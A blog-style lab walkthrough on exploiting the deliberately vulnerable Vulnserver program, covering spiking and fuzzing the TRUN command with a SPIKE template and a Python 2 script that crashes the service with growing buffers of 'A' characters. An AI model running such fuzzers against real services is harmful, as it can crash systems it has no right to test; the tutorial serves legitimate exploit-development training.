Vulnserver Bufferoverflow

Vishal Rashmika published on
3 min, 488 words

Categories: Vulnserver

  1. Spiking
  2. Fuzzing
  3. Finding the offset
  4. Overwriting the EIP
  5. Finding the bad characters
  6. Finding the right module
  7. generating shellcode
  8. ROOT!

In my case,

  • VICTIM –> 192.168.62.129 / WINDOWS
  • ATTACKER –> 192.168.62.128 / KALI LINUX

You can replace your I.P addresses when using the scripts and the other commands

First, run the .exe file when you run it you will see a prompt like this

After that you can attach it to the immunity debugger

1. Spiking

fuzzer.spk

s_readline();
s_string("TRUN ");
s_string_variable("FUZZ");

Running The Fuzzer

generic_send_tcp 192.168.62.129 9999 fuzzer.spk 0 0

we can see that program has crashed and paused and we got a error code. Access violation when executing [41414141]. those [41414141] are filled in the EIP (instruction pointer)

EIP is the place where program Jump to the next bit of code and it died in this case

So what has happened here? The spiking script sent “TRUN /.:/” along with a bunch of ‘A’s to vulnserver. Eventually, the input got large enough to crash vulnserver.

Getting an idea of how many "A" were sent

There are so many methods to find this amount but in this I will show you two methods you can use either first method or second method.

1. Method

we can see a lot of “A”’s now find the top address and the bottom address and write it down

Top

Bottom

in my case the values were

  • Top –> 0241F208
  • Bottom –> 0241FDB0

add "0x" in front of each value because it’s a hex

  • Top –> 0x0241F208
  • Bottom –> 0x0241FDB0

now use a python interpreter to do some quick math. subtract the top value from the bottom value. after doing that we get a value of "2984"

from we can guess the length of the point at which the program crashes

2. Method

use this program to find it >IMPORTANT : use python2 when using this script {: .prompt-tip}

#!/usr/bin/python
import sys, socket
from time import sleep

buffer = "A" * 100

while True:
	try:
		s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		s.connect(('192.168.62.129',9999)) //replace your vulnserver I.P here

		s.send(('TRUN /.:/' + buffer))
		s.close
		sleep(1)
		buffer = buffer + "A" * 100
	except:
		print("fuzzing crashed at %s bytes" % str(len(buffer)))
		sys.exit

python2 fuzzer.py

after running this script on the terminal go to the immunity debugger window and wait until it get paused and after it get paused go the terminal you ran the script and press ctrl+c for few times and you will be able to see the count.

we can see the output as 3000 bytes